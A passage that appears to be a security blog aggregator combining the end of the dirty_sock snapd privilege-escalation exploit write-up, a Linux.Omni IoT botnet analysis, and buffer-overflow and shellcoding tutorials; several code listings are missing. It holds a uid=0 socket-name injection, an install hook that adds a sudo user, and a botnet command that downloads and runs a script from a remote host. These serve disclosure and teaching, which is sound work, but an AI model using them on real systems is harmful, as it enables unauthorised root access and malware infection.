If we imagine the function splitting this string up by “;” and iterating through, we see that there are two sections that (if containing the string “uid=”) could potentially overwrite the first “uid=”, if only we could influence them.

The first (“socket=/run/snapd.socket”) is the local “network address” of the listening socket — the file path the service is defined to bind to. We do not have permissions to modify snapd to run on another socket name, so it seems unlikely that we can modify this.

But what is that “@” sign at the end of the string? Where did this come from? The variable name “remoteAddr” is a good hint. Spending a bit more time in the debugger, we can see that a golang standard library (net.go) is returning both a local network address AND a remote address. You can see these output in the debugging session below as “laddr” and “raddr”.

> net.(*conn).LocalAddr() /usr/lib/go-1.10/src/net/net.go:210 (PC: 0x77f65f)
=> 210:	func (c *conn) LocalAddr() Addr {
(dlv) print c.fd
	laddr: net.Addr(*net.UnixAddr) *{
		Name: "/run/snapd.socket",
		Net: "unix",},
	raddr: net.Addr(*net.UnixAddr) *{Name: "@", Net: "unix"},}

The remote address is set to that mysterious “@” sign. Further reading the man unix help pages provides information on what is called the “abstract namespace”. This is used to bind sockets which are independent of the filesystem. Sockets in the abstract namespace begin with a null-byte character, which is often displayed as “@” in terminal output.

Instead of relying on the abstract socket namespace leveraged by netcat, we can create our own socket bound to a file name that we control. This should allow us to affect the final portion of that string variable that we want to modify, which will land in the “raddr” variable shown above.

Using some simple python code, we can create a file name that has the string “;uid=0;” somewhere inside it, bind to that file as a socket, and use it to initiate a connection back to the snapd API.

Here is a snippet of the exploit POC:

## Setting a socket name with the payload included
sockfile = "/tmp/sock;uid=0;"

## Bind the socket
client_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)

## Connect to the snap daemon

Now watch what happens in the debugger when we look at the remoteAddr variable again:

=>  41:		for _, token := range strings.Split(remoteAddr, ";") {
(dlv) print remoteAddr

There we go — we have injected a false uid of 0, the root user, which will be at the last iteration and overwrite the actual uid. This will give us access to the protected functions of the API.

We can verify this by continuing to the end of that function in the debugger, and see that uid is set to 0. This is shown in the delve output below:

=>  65:		return pid, uid, socket, err
(dlv) print uid


Version One

dirty_sockv1 leverages the ‘POST /v2/create-user’ API function. To use this exploit, simply create an account on the Ubuntu SSO and upload an SSH public key to your profile. Then, run the exploit like this (using the email address you registered and the associated SSH private key):

$ -u -k id_rsa

This is fairly reliable and seems safe to execute. You can probably stop reading here and go get root.

Still reading? Well, the requirement for an Internet connection and an SSH service bothered me, and I wanted to see if I could exploit in more restricted environments. This leads us to…

Version Two

dirty_sockv2 instead uses the ‘POST /v2/snaps’ API to sideload a snap containing a bash script that will add a local user. This works on systems that do not have the SSH service running. It also works on newer Ubuntu versions with no Internet connection at all. HOWEVER, sideloading does require some core snap pieces to be there. If they are not there, this exploit may trigger an update of the snapd service. My testing shows that this will still work, but it will only work ONCE in this scenario.

Snaps themselves run in sandboxes and require digital signatures matching public keys that machines already trust. However, it is possible to lower these restrictions by indicating that a snap is in development (called “devmode”). This will give the snap access to the host Operating System just as any other application would have.

Additionally, snaps have something called “hooks”. One such hook, the “install hook” is run at the time of snap installation and can be a simple shell script. If the snap is configured in “devmode”, then this hook will be run in the context of root.

I created a snap from scratch that is essentially empty and has no functionality. What it does have, however, is a bash script that is executed at install time. That bash script runs the following commands:

useradd dirty_sock -m -p '$6$sWZcW1t25pfUdBuX$jWjEZQF2zFSfyGy9LbvG3vFzzHRjXfBYK0SOGfMD1sLyaS97AwnJUs7gDCY.fg19Ns3JwRdDhOcEmDpBVlF9m.' -s /bin/bash
usermod -aG sudo dirty_sock
echo "dirty_sock    ALL=(ALL:ALL) ALL" >> /etc/sudoers

That encrypted string is simply the text dirty_sock created with Python’s crypt.crypt() function.

The commands below show the process of creating this snap in detail. This is all done from a development machine, not the target. One the snap is created, it is converted to base64 text to be included in the full python exploit.

## Install necessary tools
sudo apt install snapcraft -y

## Make an empty directory to work with
cd /tmp
mkdir dirty_snap
cd dirty_snap

## Initialize the directory as a snap project
snapcraft init

## Set up the install hook
mkdir snap/hooks
touch snap/hooks/install
chmod a+x snap/hooks/install

## Write the script we want to execute as root
cat > snap/hooks/install << "EOF"

useradd dirty_sock -m -p '$6$sWZcW1t25pfUdBuX$jWjEZQF2zFSfyGy9LbvG3vFzzHRjXfBYK0SOGfMD1sLyaS97AwnJUs7gDCY.fg19Ns3JwRdDhOcEmDpBVlF9m.' -s /bin/bash
usermod -aG sudo dirty_sock
echo "dirty_sock    ALL=(ALL:ALL) ALL" >> /etc/sudoers

## Configure the snap yaml file
cat > snap/snapcraft.yaml << "EOF"
name: dirty-sock
version: '0.1' 
summary: Empty snap, used for exploit
description: |

grade: devel
confinement: devmode

    plugin: nil

## Build the snap

If you don’t trust the blob I’ve put into the exploit, you can manually create your own with the method above.

Once we have the snap file, we can use bash to convert it to base64 as follows:

$ base64 <snap-filename.snap>

That base64-encoded text can go into the global variable “TROJAN_SNAP” at the beginning of the exploit.

The exploit itself is writen in python and does the following:

  1. Creates a random file with the string ‘;uid=0;’ in the name
  2. Binds a socket to this file
  3. Connects to the snapd API
  4. Deletes the trojan snap (if it was left over from a previous aborted run)
  5. Installs the trojan snap (at which point the install hook will run)
  6. Deletes the trojan snap
  7. Deletes the temporary socket file
  8. Congratulates you on your success

Protection / Remediation

Patch your system! The snapd team fixed this right away after my disclosure.

Special Thanks

  • So many StackOverflow posts I lost track…
  • The great resources put together by the snap team


Chris Moberly (@init_string) from The Missing Link.

Thanks for reading!!!

Analysis of Linux.Omni

( Original text by by   )

Following our classification and analysis of the Linux and IoT threats currently active, in this article we are going to investigate a malware detected very recently in our honeypots, the Linux.Omni botnet. This botnet has particularly attracted our attention due to the numerous vulnerabilities included in its repertoire of infection (11 different in total), being able to determine, finally, that it is a new version of IoTReaper.

Analysis of the binary

The first thing that strikes us is the label given to the malware at the time of infection of the device, i.e., OMNI, because these last few weeks we were detecting OWARI, TOKYO, SORA, ECCHI… all of them versions of Gafgyt or Mirai and, which do not innovate much compared to what was reported in previous articles.

So, analyzing the method of infection, we find the following instructions:

As you can see, it is a fairly standard script and, therefore, imported from another botnet. Nothing new.

Although everything indicated that the sample would be a standard variant of Mirai or Gafgyt, we carried out the sample download.

The first thing we detect is that the binary is packaged with UPX. It is not applied in most samples, but it is not uncommon to see it in some of the more widespread botnet variants.

After looking over our binary, we found that the basic structure of the binary corresponds to Mirai.

However, as soon as we explore the binary infection options, we find attack vectors that, in addition to using the default credentials for their diffusion, use vulnerabilities of IoT devices already discovered and implemented in other botnets such as IoTReaper or Okiru / Satori, including the recent one that affects GPON routers.

Let’s examine which are these vulnerabilities that Omni uses:


Vulnerability that makes use of code injection in VACRON network video recorders in the “board.cgi” parameter, which has not been well debugged in the HTTP request parsing. We also found it in the IoTReaper botnet.

Netgear – CVE-2016-6277

Another of the vulnerabilities found in Omni is CVE-2016-6277, which describes the remote execution of code through a GET request to the “cgi-bin/” directory of vulnerable routers. These are the following:

R6400                         R7000
R7000P           R7500
R7800                         R8000
R8500                         R9000

D-Link – OS-Command Injection via UPnP

Like IoTReaper, Omni uses a vulnerability of D-link routers. However, while the first used a vulnerability in the cookie overflow, the hedwig.cgi parameter, this one uses a vulnerability through the UPnP interface.

The request is as follows:

And we can find it in the binary:

The vulnerable firmware versions are the following:

DIR-300 rev B – 2.14b01
DIR-600 – 2.16b01
DIR-645 – 1.04b01
DIR-845 – 1.01b02
DIR-865 – 1.05b03


Another vulnerability found in the malware is the one that affects more than 70 different manufacturers and is linked to the “/language/Swedish” resource, which allows remote code execution.

The list of vulnerable devices can be found here:

D-Link – HNAP

This is a vulnerability reported in 2014 and which has already been used by the malware The Moon, which allows bypassing the login through the CAPTCHA and allows an external attacker to execute remote code.

The vulnerable firmware versions on the D-Link routers are the following:

DI-524 C1 3.23
DIR-628 B2 1.20NA 1.22NA
DIR-655 A1 1.30EA

TR-069 – SOAP

This vulnerability was already exploited by the Mirai botnet in November 2016, which caused the fall of the Deutsche Telekom ISP.

The vulnerability is as follows:

We can also find it in the binary.

Huawei Router HG532 – Arbitrary Command Execution

Vulnerability detected in Huawei HG532 routers in the incorrect validation of a configuration file, which can be exploited through the modification of an HTTP request.

This vulnerability was already detected as part of the Okiru/Satori malware and analyzed in a previous article: (Analysis of Linux.Okiru)

Netgear – Setup.cgi RCE

Vulnerability that affects the DGN1000 firmware of Netgear routers, which allows remote code execution without prior authentication.

Realtek SDK

Different devices use the Realtek SDK with the miniigd daemon vulnerable to the injection of commands through the UPnP SOAP interface. This vulnerability, like the one mentioned above for Huawei HG532 routers, can already be found in samples of the Okiru/Satori botnet.


Finally, we found the latest vulnerability this past month, which affects GPON routers and is already incorporated to both IoT botnets and miners that affect Linux servers.

On the other hand, the botnet also makes use of diffusion through the default credentials (the way our honeypot system was infected), although these are encoded with an XOR key different from the 0x33 (usual in the base form) where each of the combinations has been encoded with a different key.

Infrastructure analysis

Despite the variety of attack vectors, the commands executed on the device are the same:

cd /tmp;rm -rf *;wget http://%s/{marcaDispositivo};sh /tmp/{marcaDispositivo}

The downloaded file is a bash script, which downloads the sample according to the architecture of the infected device.

As we can see, this exploit does not correspond with the analyzed sample, but is only dedicated to the search of devices with potentially vulnerable HTTP interfaces, as well as the vulnerability check of the default credentials, thus obtaining two types of infections, the one that uses the 11 previously mentioned vulnerabilities and the one that only reports the existence of exposed HTTP services or default credentials in potential targets.

Therefore, the architecture is very similar to the one found previously in the IoTReaper botnet.

Behind Omni

Investigating the references in the binaries we find the IP address 213.183.53 [.] 120, which is referenced as a download server for the samples. Despite not finding a directory listing available (in other variants it is quite common to find it), in the root directory we find a “Discord” platform, which is (officially) a text and voice chat for the gamer audience.

So, since it didn’t require any permissions or special invitation, we decided to choose a megahacker name, and enter the chat.

Once inside, we observed that the general theme of the chat is not video games, but a platform for the sale of botnet services.

After a couple of minutes in the room, it follows that the person behind the infrastructure is the user Scarface, who has decided to make some very cool advertising posters (and according to the aesthetics of the film of the same name).

In addition, it also offers support, as well as requests from potential consumers seeking evidence that their botnet is capable of achieving a traffic volume of 60 Gbps.

We can find some rather curious behaviors that denote the unprofessional nature of this group of cybercriminals, for example how Scarface shows the benefit it has gained from the botnet (and how ridiculous the amount) or how they fear that any of those who have entered the chat are cops.

So, we can determine that the Linux.Omni malware is an updated version of the IoTReaper malware, which uses the same network architecture format, besides importing, practically, all the Mirai source code.

Attached is the Yara rule for detecting the Linux.Omni malware:



(N.d.E.: Original post in Spanish)

Linux Buffer Overflows x86 – Part 3 (Shellcoding)

( Original text by SubZero0x9 )

Hello guys, this is the part 3 of the Linux buffer Overflows x86. In this part we will learn what is shellcode, why do we use it and how do we use it. In the previous two blogs, we learnt about process memory, stack region, stack operations, stack registers, attempting buffer overflow, overwriting buffer, modifying return address, manipulating program flow and program execution.
If you have not read the first two blogs, here are the links Part1 and Part2.

The main purpose behind exploiting Buffer Overflow is to spawn a reverse shell or execute arbitrary commands at least. Even if we find a vulnerable binary with stack overflow and are able to overwrite the return address, we still have to tell the binary to execute commands on our behalf. But how do we do that? Suppose we want to spawn a shell of a vulnerable binary, but the code to spawn a shell is not present in the binary. So, even if we control the flow of the binary we really can’t modify the return address to a memory address which can execute the code which spawns a shell. We saw in the previous two blogs, we were able to overwrite the buffer with any arbitrary data. This means, when the program is loaded into memory all the operations are carried out on the stack. Any user input accepted will be stored on the stack and if the program accepts malicious input (remember insufficient bound checking) it also gets stored on the stack. So instead of placing random data, if we place the code which we want to execute on to the stack it will give us the results.
Simple Right? NO !!

We can’t simply go ahead and paste the code of spawning a shell onto the buffer, because when the program is running it is loaded into the system memory and it communicates with the processor for carrying out the operations through syscalls which is understood by kernel who actually communicates with the processor to get things done(well this is a simplified statement, the actual process is too complex). Now the processor doesn’t understand C,C++, JAVA, Python, etc. it only understands the machine code which it can directly execute. And We, human beings can’t understand machine code so we write programs in high level languages. Also, machine code is mostly regarded as the lowest level representation of compiled code. Another main reason we use machine code is because of the size. The space available in the stack for operations are very limited and machines codes are really compact in that sense.


So till now it is pretty clear that the code or payload used to exploit the buffer overflow vulnerability to execute arbitrary commands is called Shellcode. Its name is derived from the fact that it was initially used to spawn a root shell. Shellcode is basically a set of machine code or set of instructions injected into the buffer of the vulnerable program. The vulnerable program then executes the shellcode.

Shellcodes are machine codes. Basically, we write a set of instructions in a high level language or assembly language then convert into hexadecimal values (these values are just a bunch of opcodes and operands understood by the processor).

We cannot run shellcode directly, instead it needs a some sort of carrier (buffer, file, process, environment variables, etc) which will be read or executed by the vulnerable software. There are many shellcode execution strategies which are used depending on the exploitability and constraints of the vulnerable software.

Shellcodes are written mainly to force the program to do actions on the behalf of the attacker. The attacker can write a specific function which will do the intended action once loaded into the same address space of the vulnerable software. Every action (well almost) in an operating system is done by calling a syscall or system calls. The shellcode will also contain a syscall for a specific action which the attacker needs to perform. Syscalls are the most important thing in the shellcode as you can force the program to perform action just by triggering a syscall.


According to wikipedia, “In computing, a system call is the programmatic way in which a computer program requests a service from the kernel of the operating system it is executed on. ”

Linux’s security mechanism (the ring model) is divided into two spaces : User Space and Kernel space. Eevery process running in the userspace has its own virtual address space and cannot access any other processes address space until explicitly allowed. When the process in the userspace wants to access the kernel space to execute some operations, it cannot directly access it. No processes in the userspace can access the kernel space.

When an userspace process tries to access the kernel, an exception is raised and prevents the process from accessing the kernel space. The userspace processes uses the syscalls to communicate with the kernel processes to carry out the operations.

Syscalls are a bunch of functions which gives a userland process direct access to the kernel space to carryout low level functions. In simpler words, Syscalls are an interface between user mode and kernel mode.

In Linux, syscalls are generated using the software interrupt instruction, int 0x80. So, when a process in the user mode executes the int 0x80 instruction, the flow is transferred from the user mode to kernel mode by the CPU and the syscall is executed. Other than syscalls, there are standard library functions like the libc (which is extensively used in the linux OS). These standard library functions also call the syscall in some way or another (not everytime though). But we wont look into that as we are not going to use library functions in our shellcode. Also, using syscall is much nicer because there is no linking involved with any library as needed in other programming languages.

Note: The software interrupt int 0x80 was proving to be slower on the Pentium processors, so Linus introduced two new alternative namely SYSENTER/SYSEXIT instructions which were provided by all Pentium II+ processors. We will use the int 0x80 instruction in our shellcode however.


When a process is in the userspace and the syscall instruction is executed, the interrupt handler i.e the software interrupt int 0x80 tells the CPU to change the execution from user mode to kernel mode. Now the system call handler is notified to call the routine which the userland process wanted. All the syscalls are stored in a syscall table, it is a big array which points to the memory address of the syscall routines. When the syscall is called, the syscall number is loaded into EAX register, this is how the system call handler comes to know which system call routine to execute. Keep in mind that the execution done here is carried out on the Kernel space stack and after the execution the control is given back to the userspace process and the remaining operation is carried out on userspace stack.

Here is the list of all the syscalls (x86):-

Each syscall is assigned a syscall number (an integer value) for basic naming convention. Every syscall has arguments which are necessary to execute the related operations. The syscall number is stored in the EAX register and the arguments are stored in the EBX , ECX , EDX , ESI and EDI respectively.

All the linux syscalls are well documented with instructions of how to implement them in your program. Usually we can use the syscall in normal C program or we can go ahead and do the same in an assembly language. Since we are writing our own shellcode, we have to dip our hands in the world of assembly language.

So what we will do is, write a C program with the syscall, disassemble the program, see the assembly instructions, write the assembly equivalent, make the necessary changes and extract the shellcode. Now we could have done this in assembly language directly but for getting the whole idea of how a program works from the high level to low level I am choosing this path.

Basic Assembly knowledge is needed for this, if you are new to Assembly then you can read the Assembly and Shellcoding blog series by my friend SLAER.


Lets write a shellcode for spawning a shell. We will use execve syscall for this operation.

First, lets take a look at the man page for execve..

The whole function looks like this:-

Here, filename is the command or program which we want to execute, in our case “/bin/sh”. Argv is an array of the argument string passed to the new program and it should contain the filename in its first index. Envp array can be NULL. Also the argvand envp array must end with a NULL.

We will initiate a char array spawnshell[2], with spawnshell[0]= “/bin/sh” and the next index being NULL i.e spawnshell[1]=NULL. We declared the last index as NULL because argv must end with a NULL byte.

So, execve will look like:

The C code for spawning a shell :

Compiling the program:

(We used static flag while compiling to prevent the dynamic linking as we want to disassemble the execve function.)

Running the executable we get a shell.

Lets disassemble the main function in our favorite GDB:

Here, the execve is called from the libc library, because we wrote a C program and used stdlib. Before calling the execve() function, the arguments required by it are stored on the stack. We will see the important instructions in detail:

sub $0x14, %esp -> Subtracting 14 from ESP, this is how the space is allocated on the stack.

1) movl $0x80bb868,-0x14(%ebp) -> Moving the memory address 0x80bb868 which contains “/bin/sh” on the stack. (You can see the value by using the command x/1s 0x80bb868 in GDB)

2) movl $0x0,-0x10(%ebp) -> Moving 0 on the stack at -0x10(%ebp), means the NULL byte after the “/bin/sh”.

3) mov -0x14(%ebp),%eax -> EAX now has the “/bin/sh”.

4) push $0x0 -> 0 is pushed onto the stack.

5) lea -0x14(%ebp),%edx -> The effective address of -0x14(%ebp) is loaded into EDX i.e EDX is pointing to the pointer of “/bin/sh”.

6) push %edx -> Pushing the value of EDX on the stack.

7) push %eax -> Pushing the value of EAX on the stack.

8)call 0x806c990 <execve> -> calling the function execve.

So what does this mean? Every numbered points are explained below in the same manner:-

1) filename = “/bin/sh”

2) filename = “/bin/sh” followed by NULL

3) argv[0]= “/bin/sh”

4) 0 is pushed for the envp

5) pointing to the pointer of “/bin/sh” i.e argv

6) EDX=argv

7) EAX= filename

8) execve function is called

Now the execve function according to the arguments pushed onto the stack will look like:-

execve(EAX, EDX,0)

So, now we know what to do with the assembly instructions. Lets write an assembly program for execve syscall.

Lets look at the execve syscall w.r.t assembly instructions:

Assembly program:-

Assemble this program:

Link this program:

Running the program we can see we get a shell.

Now, we want to extract the opcodes from the executable to form our shellcode. We will use objdump utility to display the object file.

Here, we can see in the right side, the assembly instructions that we wrote and in the left side opcodes for those instructions. Now we just have to copy these opcodes and execute it from C program which will act as a carrier for our shellcode.

Our Shellcode now is:


As we already know we cannot execute shellcode directly, we will be needing a program to execute it for us. Shellcode is always loaded into the virtual address space of the target process which we want to exploit. Shellcode cant have its own process space as it cant be executed directly and it doesn’t makes sense to load the shellcode in any other address space other than the vulnerable software.

Just for demonstration we will load the shellcode in the address space of our own program and see whether it gets executed or not.

We will write a small C program which will execute our shellcode:

So, whats the program doing?

First, we are defining a char array shellcode with our actual shellcode in it. Then, in the main() function we are defining a variable ret which is an int pointer.

Then we are making the ret variable point to an address which is 8 bytes (2 int value)from its own address.

Remember this will happen on the stack, and the addresses on the stack moves from higher order memory to the lower order memory. So, by adding 8 bytes to the address of ret variable we are actually making it points towards the main()function.

Then we are assigning the address of our shellcode array to the address of the retvariable which is pointing to the address of main. So before the program ends it will execute our shellcode.

Lets compile the program:

Running the program we get Segmentation fault (core dumped)

So, we can see that our shellcode didn’t work. Lets take a look at what is wrong with our shellcode.

We can see there are a bunch of NULL bytes in the opcodes i.e ‘00’. Now one important thing, mostly the shellcode is loaded into the user input buffer and mostly it will be a char buffer or string buffer. If a NULL value occurs in the string, it terminates the string right there and doesn’t accept anything after the NULL termination. So our shellcode containing NULL values wont work. So we have to find a way to eliminate the NULL values.

Also, we are using hardcoded addresses in our shellcode. As we can see the mov instructions, all those addresses are machine specific hardcoded addresses. It is highly likely that it might not work in different versions of linux. So we have to deal with that also. One thing we can do is somehow load the starting address of our shellcode in the memory and using that reference we can make the necessary operations relative to this address. Now this is called as relative addressing. We will see this later in more detail.

Now the important part is to modify the assembly code with the two requirements mentioned above, getting rid of the NULL values and implementing relative addressing for avoiding hardcoded addresses .


So lets start…

From the above assembly program we know what instructions are needed to create our shellcode. In the above program we defined an ASCII string with “/bin/sh” and assigned the address of the string to another variable which will act as the pointer. But in the shellcode we will get the memory address of that variable and it will not work around different linux machines as the address may differ.

So in the manpages of the execve syscall it is clearly stated that, “The argv and envp arrays must each include a null pointer at the end of the array.” In our case envparray is already NULL, but the filename i.e the first index of argv pointer should also end with a NULL value. In the above assembly program we were defining separate variables for each argument of the syscall, but now we cant do that.

The execve syscall has three char pointer arguments. For the first argument we will have “/bin/shA”. We are appending A because we directly cant add a NULL value as it will hamper our shellcode, instead we will assign the index of A, a null value from the register. For the next char argument we will append four B’s as char is 4 bytes. Now the second argument is a pointer to the start of the address of the filename. Here we will assign the index of the starting B with the address of the starting memory address of filename. The third argument is the envp array which is a NULL pointer and we will append it with four C’s and then we will assign the index of the first C with a null value.

The representation of execve syscall arguments w.r.t registers will be like:

int execve(EBX, ECX, EDX); and the execve syscall number 11 will be loaded in the EAX register.

Below is the representation of the string which we will load along with the index in hex.

Lets take a look into the final assembly program for our shellcode.

Refined assembly program for Shellcode:

Now I will explain in detail what we have done.

-> We are starting our shellcode with a jmp instruction. jmp instruction will make an unconditional jump to the specified memory location. It will skip the actual shellcode and directly jump to the ShellcodeCall memory address.

-> In there the call instruction is executed which will directly point our Shellcode. Now what happens here is the most important thing. When the call instruction is executed the next instruction or memory address which contains the string “/bin/shABBBBCCCC” is pushed onto the top of the stack as the ret address. This is how we implement relative addressing.

->Now the pop instruction is executed. So the pop instruction will load the retaddress which has the string in the ESI register. The ESI register has the memory location which points to “/bin/shABBBBCCCC”. ESI register will be the reference point for all the operation which we will perform so the issue of hardcoded addresses will be resolved.

->Next we are XORing the EAX register to avoid the NULL bytes. We are basically resetting the EAX register without assigning a NULL value.

->Then we are loading the value 0 from the AL register (As we all know the ALregister is the lower part of the EAX address which is already 0 after the XORing) to the 7th index of the ESI register which will replace the A in our string with a null value.

-> Then we are loading the value of ESI i.e the start address of our string into the 8th index of ESI register replacing the B’s in our string.

->Then we are loading 0 from the AL register into the 12th index of our ESI register i.e replacing the C’s with 0’s.

-> Then we are loading the arguments of execve into the EBXECX and EDXregisters.

->Then we are loading the execve syscall number 11 into AL register again avoiding the NULL bytes because the higher part of the EAX register holds 0.

-> Lastly we make a software interrupt which will execute the syscall.

Now lets take a look at the opcodes after assembling and linking the assembly program.

As we can see there are no null bytes and the hardcoded addresses are also solved.

Now lets copy our shellcode into the C program which we wrote earlier to check whether our shellcode executes or not.

Lets run the compiled C program binary and see if it works.


We successfully spawned a shell with our own shellcode.

This was a very basic example of writing a working shellcode. Now there are many situations where you want take a reverse shell over the network and you have to write a shellcode for that. That would be a really challenging task to write a shellcode of that manner. This blog post only introduced what a shellcode looks like and how much pain you have to take to write a simple working shellcode.

In the next part, we will exploit a vulnerable binary and execute shellcode on that.

If you have any doubts or opinions, kindly express yourselves in the comment section. Thanks !!!

Linux Buffer Overflows x86 Part 2 ( Overwriting and manipulating the RETURN address)

( Original text by SubZero0x9 )

Hello Friends, this is the 2nd part of the Linux x86 Buffer Overflows. First of all I want to apologize for such a long delay after the First blog of this series, there were personal and professional issues going on in my life (Well who hasn’t got them? Meh?).

In the previous part we learned about the Process Memory, Stack Region, Stack Operations, Stack Registers, Attempting Buffer Overflow, Overwriting Buffer, ESP and EIP. In case you missed it, here is the link to the Part 1:

Quick Recap to the Part 1:

-> We successfully exploited the insufficient bound checking by giving input which was larger than the buffer size, which led to the overflow.

-> We successfully attempted to overwrite the buffer and the EIP (Instruction Pointer).

-> We used GDB debugger to examine the buffer for our input and where it was placed on the stack.

Till now, we already know how to attempt a buffer overflow on a vulnerable binary. We already have the control of EIP and ESP.

So, Whats Next ?

Till now we have only overwritten the buffer. We haven’t really exploit anything yet. You may have read articles or PoC where Buffer Overflow is used to escalate privileges or it is used to get a reverse shell over the network from a vulnerable HTTP Server. Buffer Overflow is mainly used to execute arbitrary commands on the vulnerable system.

So, we will try to execute arbitrary commands by using this exploit technique.

In this blog, we will mainly focus on how to overwrite the return address to manipulate the flow of control and program execution.

Lets see this in more detail….

We will use a simple program to manipulate its intended output by changing the RETURN address.

(The following example is same as the AlephOne’s famous article on Stack Smashing with some modifications for a better and easy understanding)



This is a very simple program where the variable random is assigned a value ‘0’, then a function named function is called, the flow is transferred to the function()and it returns to the main() after executing its instructions. Then the variable random is assigned a value ‘1’ and then the current value of random is printed on the screen.

Simple program, we already know its output i.e 1.

But, what if we want to skip the instruction random=1; ?

That means, when the function() call returns to the main(), it will not perform the assignment of value ‘1’ to random and directly print the value of random as ‘0’.

So how can we achieve this?

Lets fire up GDB and see how the stack looks like for this program.

(I won’t be explaining each and every instruction, I have already done this in the previous blog. I will only go through the instructions which are important to us. For better understanding of how the stack is setup, refer to the previous blog.)

In GDB, first we disassemble the main function and look where the flow of the program is returned to main() after the function() call is over and also the address where the assignment of value ‘1’ to random takes place.

-> At the address 0x08048430, we can see the value ‘0’ is assigned to random.

-> Then at the address 0x08048437 the function() is called and the flow is redirected to the actual place where the function() resides in memory at 0x804840b address.

-> After the execution of function() is complete, it returns the flow to the main()and the next instruction which gets executed is the assignment of value ‘1’ to random which is at address 0x0804843c.

->If we want to skip past the instruction random=1; then we have to redirect the flow of program from 0x08048437 to 0x08048443. i.e after the completion of function() the EIP should point to 0x08048443 instead of 0x0804843c.

To achieve this, we will make some slight modifications to the function(), so that the return address should point to the instruction which directly prints the randomvariable as ‘0’.

Lets take a look at the execution of the function() and see where the EIP points.

-> As of now there is only a char array of 5 bytes inside the function(). So, nothing important is going on in this function call.

-> We set a breakpoint at function() and step through each instruction to see what the EIP points after the function() is exectued completely.

-> Through the command info regsiters eip we can see the EIP is pointing to the address 0x0804843c which is nothing but the instruction random=1;

Lets make this happen!!!

From the previous blog, we came to know about the stack layout. We can see how the top of the stack is aligned, 8 bytes for the buffer, 4 bytes for the EBP, 4 bytes for the RET address and so on (If there is a value passed as parameter in a function then it gets pushed first onto the stack when the function is called).

-> When the function() is called, first the RET address gets pushed onto the stack so the program flow can be maintained after the execution of function().

->Then the EBP gets pushed onto the stack, so the EBP can act as the offset reference point for other instructions to access and calculate the memory addresses.

-> We have char array buffer of 5 bytes, but the memory is allocated in terms of WORD. Basically 1 word=4 bytes. Even if you declare a variable or array of 2 bytes it will be allocated as 4 bytes or 1 word. So, here 5 bytes=2 words i.e 8 bytes.

-> So, in our case when inside the function(), the stack will probably be setup as buffer + EBP + RET

-> Now we know that after 12 bytes, the flow of the program will return to main()and the instruction random = 1; will be executed. We want to skip past this instruction by manipulating the RET address to somehow point to the address after 0x0804843c.

->We will now try to manipulate the RET address by doing something like below :-


Here, we are introducing an int pointer ret, and we are assigning it the starting address of buffer + 12 .i.e (wait lets see this in a diagram)

-> So, the ret pointer now ends exactly at the start where the return value is actually stored. Now, we just want to add ret pointer with some value which will change the return value in such a manner that it will skip past the return = 1;instruction.

Lets just go back to the disassembled main function and calculate how much we have to add to the ret pointer to actually skip past the assignment instruction.

-> So, we already know we want to skip pass the instruction at address 0x0804843c to address 0x08048443. By subtracting these two address we get 7. So we will add 7 to the return address so that it will point to the instruction at address 0x08048443.

-> And now we will add 7 to the ret pointer.


So our final code should look like:


So, now we will compile our code.


Since we are adding code and re-compiling the program, the memory addresses will get changed.

Lets take a look at the new memory addresses.

-> Now the assignment instruction random = 1; is at address 0x08048452 and the next address which we want the return address to point is 0x08048459. The difference between these addresses is still 7. So we are good till now.

Hopefully by executing this we will get the output as “The value of random is: 0”


Why did it gave the Segmentation fault (core dumped)? That means maybe the process is trying to access a memory that doesn’t exist or something.

Note:- Well this was really tricky for me atleast. Computers works in mysterious ways, it is not just mathematics, numbers and science ( Yeah I am being dramatic)

Lets fire up our binary in GDB and see whats wrong.

-> As you can see we set a breakpoint at line 4 and run the program. The breakpoint hits and the program halts. Then we examine the stack top and what we see, the distance between the start of the buffer and the start of return address is not 12, its 13. (It doesn’t even make sense mathematically). Three full block adds up for 12 bytes (4 bytes each) and 1 byte for that ‘A’ i.e 41.

-> Our buffer had value “ABCDE” in it. And A in ASCII hex is 41. From 41 to just right before of the return address 0x08048452, the count is 13 which traditionally is not correct. I still don’t know why the difference is 13 instead of 12, if anyone knows kindly tell me in the comments section.

-> So we just change our code from ret = buffer + 12; to ret = buffer + 13;

Now the final code will look like this:


Now, we re-compile it and run and hope its now going to give a desired output.

Before continuing lets see this again in GDB:

> So, we can see now after 7 is added to the ret pointer, the return address is now 0x08048459 which means we have successfully skipped past the assignment instruction and overwritten the return address to manipulate our way around the program flow to alter the program execution.

Till now we learnt a very important part of buffer overflow i.e how to manipulate and overwrite the return address to alter the program execution flow.

Now, lets another example where we can overwrite the return address in more similar ‘buffer overflow’ fashion.

We will use the program from protostar buffer overflow series. You can find more about it here:


Small overview of a program:-

->There is a function win() which has some message saying “code flow successfully changed”. So we assume this is the goal.
-> Then there is the main(), int pointer fp is declared and defined to ‘0’ along with char array buffer with size 64. The program asks for user input using the getsfunction and the input is stored in the array buffer.
-> Then there is an if statement where if fp is not equal to zero then it calls the function pointer jumping to some memory location.

Now we already know that gets function is vulnerable to buffer overflow (visit previous blog) and we have to execute the win() function. So by not wasting time lets find out the where the overflow happens.

First we will compile the code:


We know that the char array buffer is of 64 bytes. So lets feed input accordingly.

So, as we can see after the 64th byte the overflow occurs and the 65th ‘A’ i.e 41 in ASCII Hex is overwriting the EIP.

Lets confirm this in GDB:

-> As we see the buffer gets overflowed and the EIP is overwritten with ‘A’ i.e 41.

Now lets find the address of the win() function. We can find this with GDB or by objdump.

Objdump is a tool which is used to display information about object files. It comes with almost every Linux distribution.

The -d switch stands for disassemble. When we use this, every function used in a binary is listed, but we just wanted the address of win() function so we just used grep to find our required string in the output.

So it tells us that the win() function’s starting address is 0804846b. To achieve our goal we just have to pass this address after the 64th byte so that the EIP will get overwritten by this address and execute the win() function for us.

But since our machine is little endian (Find more about it here)we have to pass the address in a slightly different manner (basically in reverse). So the address 0804846b will become \x6b\x84\x04\x08 where the \x stands for HEX value.

Now lets just form our input:

As we can see the win() function is successfully executed. The EIP is also pointing the address of win().

Hence, we have successfully overwritten the return address and exploited the buffer overflow vulnerability.

Thats all for this blog. I am sorry but this blog also went quite long, but I will try to keep the next blog much shorter. And also, in the next blog we will try to play with shellcode.



Getting Started with Linux Buffer Overflows x86 – Part 1 (Introduction)

( Original text by SubZero0x9 )

